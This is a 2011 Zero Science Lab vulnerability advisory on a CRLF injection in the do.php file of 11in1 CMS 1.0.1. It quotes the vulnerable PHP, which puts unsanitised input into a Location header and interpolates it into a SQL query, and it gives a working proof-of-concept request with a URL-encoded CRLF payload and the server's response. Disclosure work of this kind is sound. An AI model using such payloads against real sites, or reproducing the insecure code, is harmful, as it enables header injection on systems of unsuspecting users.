11in1 CMS 1.0.1 CRLF Injection

`  
11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability  
  
  
Vendor: 11in1  
Product web page: http://www.11in1.org  
Affected version: 1.0.1  
  
Summary: Eleven in One is an open-source content management  
system (CMS) that is powered by PHP and MySQL. It does not  
only help you manage your personal blog but also maintain  
your postings at social networks. By establishing consistency  
among the data transmitted from and to the blog, this CMS  
sustains continuous harmonization of your data over time.  
  
Desc: Input passed to the 'content' parameter in 'do.php' on  
line 2112 is not properly sanitised before being returned to  
the user. This can be exploited to insert arbitrary HTTP  
headers, which are included in a response sent to the user.  
  
  
==============================================================  
/admin/do.php:  
--------------------------------------------------------------  
  
2088: // update status  
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))  
2090: {  
2091: $content = htmlspecialchars($_POST['content']);  
2092:  
2093: // Get database information  
2094: $Database = new Database;  
2095: $info = $Database->getInfo();  
2096:  
2097: // connect to database  
2098: $conn = mysql_connect($info[0], $info[1], $info[2]);  
2099: mysql_select_db($info[3], $conn);  
2100:  
2101: $date = date("Y-m-d H:i:s");  
2102:  
2103: // clear table  
2104: $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");  
2105:  
2106: // close connection to db  
2107: mysql_close($conn);  
2108:  
2109: // prepare success message  
2110: $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);  
2111:  
2112: header("Location: msg.php?connect=yes&status=$content");  
2113: }  
  
==============================================================  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache 2.2.21  
MySQL 5.5.16  
PHP 5.3.8  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Zero Science Lab  
  
  
  
Advisory ID: ZSL-2011-5055  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php  
  
  
  
06.11.2011  
  
------  
  
  
POST /11in1/admin/do.php?action=postStatus HTTP/1.1  
Content-Length: 47  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection  
  
--  
  
HTTP/1.1 302 Found  
Date: Sun, 06 Nov 2011 18:53:29 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: msg.php?connect=yes&status=  
ZSL-Custom-Header: love_injection  
Content-Length: 1716  
Keep-Alive: timeout=5, max=97  
Connection: Keep-Alive  
Content-Type: text/html  
`